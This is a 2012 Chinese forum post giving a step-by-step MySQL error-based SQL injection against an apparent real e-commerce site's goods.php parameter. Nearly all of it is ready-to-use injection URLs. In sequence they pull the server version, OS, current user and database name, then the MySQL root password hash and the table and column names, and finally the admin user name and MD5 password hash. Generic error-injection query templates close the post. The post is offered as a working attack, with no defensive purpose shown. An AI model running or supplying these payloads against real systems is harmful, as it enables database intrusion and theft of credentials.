找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2229|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
% h5 |% B% N9 [8 J$ F* R# {http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 t: B/ X/ O$ ]6 a  j; \
2 G; h% N; d! L5 D0 o
判断系统$ q& n1 r* r, F4 t- T

5 G" F9 ]; k6 A+ [0 h9 Hhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 E2 w. @1 t8 I

+ d4 d7 ~9 l! v$ k+ J1 N9 g2 u. h/ C: N: M" z9 n

0 d1 e. `! ~9 l( c当前 user()9 h; J! V5 L( X/ i

, c4 Z3 e/ n4 lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 |% D+ l: B6 w( w# I  c' L
: Z/ P* r0 W! ]& l9 ]) p( O7 q. l; H1 R2 {. g

5 l! t  q3 f; I当前 database()$ P$ R. {9 ?" r& W# }  f' o2 o' D
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- o' @8 l+ j9 b  }9 d$ F# f3 K
7 F8 g' L+ R9 r2 e3 p  i7 H2 [9 u1 x; d0 |
) m$ b! `2 O  \% T& [0 V
7 m6 v$ V0 z4 e" T4 T/ F8 e
root hash' ~  x; {2 V1 }8 m' E( ~
' ]* j. W1 I1 S! ^- G6 x3 F/ a0 O( @
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. w* @2 b, M6 Y, o) y  U% ~5 ?" l3 _) U+ D* q

6 _: K  G( g# h* v" E/ h  i" \2 I  q5 S- m( a
当前 数据库表名
+ i% ~5 I. ^- k+ @8 F+ T( p- m+ ?/ y3 Z3 |
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
1 \/ x' f' O/ f9 D; Z& h
, ]2 v# L8 E% P6 n
0 {+ M2 I8 e8 e, B
6 q  n( n) r! I# |$ s5 ]/ J  Y当前 数据库 user_name 字段. k$ r* c; k' ?2 K. b6 W1 @

" F/ ?8 W/ ^5 P8 w- h! Phttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 {8 O8 F/ d: c& }8 X2 z2 ^
: r) ~. e5 \$ i( i当前 数据库 字段 password& h' N. u* Z2 C& R) o+ d
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ E( n* @* W( I" }- O( j7 m) m( n  {
6 r; G6 B2 {+ p& S

2 n/ O' _" L$ {& j' t: U, Q5 X# X: i5 l" V6 n' B
获得 admin passwd(md5)
! ?% }' O4 m( c* H3 F. J; M# D- @) _/ g9 [; `# ^
4 M: H9 h; z' e. Q, D" K
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 y7 S9 w9 m4 g& Y& D" I% a4 O; P% |* d" _, `+ d% z; T
报错注射
$ h9 [* E) i# l+ I) YSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
: `! @2 ?4 ~% @4 A" |$ M. d
" z( n8 y6 y/ V: ASELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)% l9 E# a2 O2 I

! z* h) z- C$ B+ ]/ Tand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表